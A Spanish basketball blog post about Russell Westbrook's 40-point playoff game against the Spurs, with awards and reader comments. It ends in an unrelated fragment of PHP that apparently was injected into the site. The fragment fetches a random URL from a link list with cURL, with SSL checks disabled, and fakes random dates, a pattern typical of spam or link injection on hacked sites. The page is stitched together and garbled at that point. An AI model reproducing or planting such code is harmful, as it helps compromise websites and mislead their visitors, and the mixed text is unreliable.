La Crónica: ¡Por el poder de Westbrook!

28 de May de 2014 por TheDeerHunter

No hay muchos jugadores capaces de canalizar las energías que le rodean tan a su favor como Russell Westbrook. Anoche aprovechó la cresta de la ola anímica del tercer partido para devorar brutalmente a sus rivales. No sólo fueron sus 40 puntos, sus 5 rebotes o sus 10 asistencias… También fueron fundamentales sus robos y su implicación en la mayoría de pérdidas de los Spurs. La sensación de estar en todos y cada uno de los contragolpes que desquiciaron por completo al equipo de Popovich (21 a 0 en este aspecto, nada menos). Hasta 63 puntos generó algo que no veíamos Iverson en el 2003 ante los Pistons. Ya el 6º jugador de las últimas 25 campañas con mayor números de partidos con más  de 30 puntos, 10 asistencias y 5 robos.

A tan rutilante actuación se unió la 2ª mejor primera parte anotadora en playoffs de la carrera de Kevin Durant. Fue la tercera que entre ambos anotan más de 30 puntos cada uno con al menos el 50% de acierto. Sólo Wade y LeBron les igualan en esta estadística y un peldaño por detrás están Parker y Duncan, precisamente. Por si no fuera suficiente vimos a Ibaka aparentemente recuperado de sus problemas físicos.

Ante tales antecedentes a veces sólo queda aguantar el chaparrón. Viendo que no podía ser y cómo se estaban desquiciando sus mejores jugadores Popovich optó por limitar mucho sus minutos renunciando a disputar el partido mucho antes del último cuarto. Fue el día de Cory Joseph, Matt Bonner, Baynes o Ayres… aunque el mejor de su equipo fue Boris Diaw. Toca lamer las heridas y recuperarse para el quinto de la serie en San Antonio. El panorama se ha puesto muy difícil y esto empieza a recordar peligrosamente a la final de conferencia del 2012. 

PREMIOS

MVP: Alarmas en San Antonio. Con Russell Westbrook jugando a nivel MVP los Thunder tienen muchas posibilidades de dar la gran sorpresa del año. El base jugó 46 minutos en los que anotó 40 puntos, repartió 10 asistencias y robó 5 balones. Estuvo en todas partes.

Sorpresa: Extraño partido el de ayer. Nadie destacó por encima de sus posibilidades y los que lo hicieron lo consiguieron gracias a los minutos de la basura, que fueron mucho. Sería el caso de Cory Joseph que se fue para casa con 11 puntos.

Decepción: Todos sabíamos que a pesar de los 2 primeros partidos los Spurs no lo tendrían fácil pero estos dos partidos en Oklahoma City nos han enfriado un poco a todos. Tras anotar los primeros 8 puntos del partido, el quinteto de los Spurs fue incapaz de plantar cara al rival en ningún momento.

Esfuerzo en vano: Al poco de comenzar la segunda parte, Popovich ya se dió cuenta de que más valía pensar en el siguiente partido en casa. Al final, fue el francés Boris Diaw (14p – 10r – 3a) el más destacado de los suyos.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Vader dice:
    #1

    ¿Que epoca podrian marcar estos Thunder con un Doc Rivers o un Phil Jackson a los mandos? Es posible que con Brooks lo hagan igualmente pero siempre que veo su exhuberancia física y la calidad de sus estrellas y tambien de sus secundarios pienso que con un entrenador de la elite serian campeones seguro y podrian crear una larga dinastia.

    Tambien espero que este verano usen alguna ronda o jugador joven para largar a Perkins y darle el puesto a Steve Adams o conseguir “algo” más para esa posición. Tyson Chandler seria una buena opción y si Melo no renueva con Knicks seguro que por una primera ronda estos lo soltarian.

    En fin, un equipazo que ha poco que les respeten pas lesiones e Ibaka pueda jugar tienen pinta de campeones.

    Saludos

      Citar

  2. dunc dice:
    #2

    No sé, no sé… Yo después de estos 4 partidos tan diferentes sólo veo un beneficiado: Miami

      Citar

  3. HisRoyalAirness dice:
    #3

    Yo lo que tenía claro viendo los dos primeros partidos y los playoffs en general era: la NBA babea por una final Lebron-KD y no iba a permitir una barrida

      Citar

  4. Denise dice:
    #4

    HisRoyalAirness:
    Yo lo que tenía claro viendo los dos primeros partidos y los playoffs en general era: la NBA babea por una final Lebron-KD y no iba a permitir una barrida

    Venga hombre…ahora resulta que la culpa del 3-1 y el 2-2 respectivamente no es de que James es el Dios del baloncesto, ó que Westbrook inspirado más el factor sorpresa de Ibaka han revitalizado a los Thunder. La culpa es de los arbitros y del Silverato….
    En serio, esas conspiraciones imaginarias me parecen un pobre argumento para definir estos grandes Playoffs.

      Citar

  5. Denise dice:
    #5

    Si alguno teneis la suerte de tener una primera ó segunda residencia a 75 millas de Orlando, ó tener un familiar por ahí que pueda participar en vuestro nombre, que sepan que los Orlando Magic pagan 100.000 dolares a aquel que acierte los 14 primeros picks del próximo Draft.
    http://www.nba.com/magic/draftcontest

      Citar

  6. HisRoyalAirness dice:
    #6

    Denise, tranquilidad

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>